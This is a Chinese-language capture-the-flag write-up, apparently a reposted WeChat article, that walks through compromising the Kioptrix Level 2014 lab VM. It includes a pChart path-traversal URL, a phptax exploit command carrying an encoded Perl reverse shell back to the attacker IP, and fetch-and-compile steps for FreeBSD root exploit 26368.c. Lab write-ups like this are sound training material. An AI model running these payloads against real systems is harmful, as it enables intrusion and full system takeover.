靶场系列之Kioptix Level 2014
- 主机探测
- 端口扫描
- 常规访问
- 1.80端口开放http
- 2.目录扫描
- 3.尝试突破边界
- 提权
主机探测
攻击机:192.168.44.128
靶机:192.168.44.135
端口扫描
nmap -sS -T5 192.168.44.135 -A
常规访问
1.80端口开放http
发现存在提示,提示了pChart2.1.3/index.php
但是也没有什么有用信息
2.目录扫描
dirsearch:
dirsearch -u http://192.168.44.135/ -e* -x 404
dirb:
dirb http://192.168.44.135
3.尝试突破边界
没有什么有用信息,提示了pChart2.1.3
看看有没有直接可以利用的exp
刚好版本相同
常规的exp利用,他是txt,cat查看利用方式
访问到文件信息了,任意文件查看
看到freebsd系统,看看有没有现成exp
可惜没有相应的apache版本
一开始目录扫描发现8080端口拒绝访问
尝试在任意文件访问找8080的配置文件
先查一手FreeBSD的apache默认路径
然后常规构造payload:
http://192.168.44.135/pChart2.1.3/examples/index.php?Action=View&Script=/../../../../usr/local/etc/apache22/httpd.conf
发现需要user-agent mozilla/4.0访问
利用插件构造user-agent 访问8080端口
又是一个新页面,常规探索一手
提示phptax,找找exp,有一个代码执行漏洞
常规的exp利用过程
构造payload发现登不上nc
可能是构造payload哪里出错了
上GitHub找找exp
下载exp运行
python3 phptax_exp.py -u http://192.168.44.135:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.44.128%22%3B%24p%3D6666%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
提权
发现是www用户,常规信息收集准备提权
查看版本内核,发现是 FreeBSD 9.0-RELEASE
再次找FreeBSD的exp,多多尝试
FreeBSD系统默认是没有wget命令,需要使用fetch命令
通过不断的尝试,最终26368.c提权成功
后面发现直接找9.0只有两个
使用fetch命令,要在kali中开启apache
然后将本地的exp上传到 /var/www/html才能让靶机找到
靶机下载exp之后,常规编译,权限,使用
fetch http://192.168.44.128/26368.c
gcc 26368.c -o 26368
chmod 777 26368
./26368
至此kioptrix level系列靶机完全结束。
这是泷羽的帮会,感兴趣的可以进来看看,超多大佬分享资料B站泷羽sec
原文始发于微信公众号(泷羽Sec-羽琳安全):靶场系列之Kioptix Level 2014
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论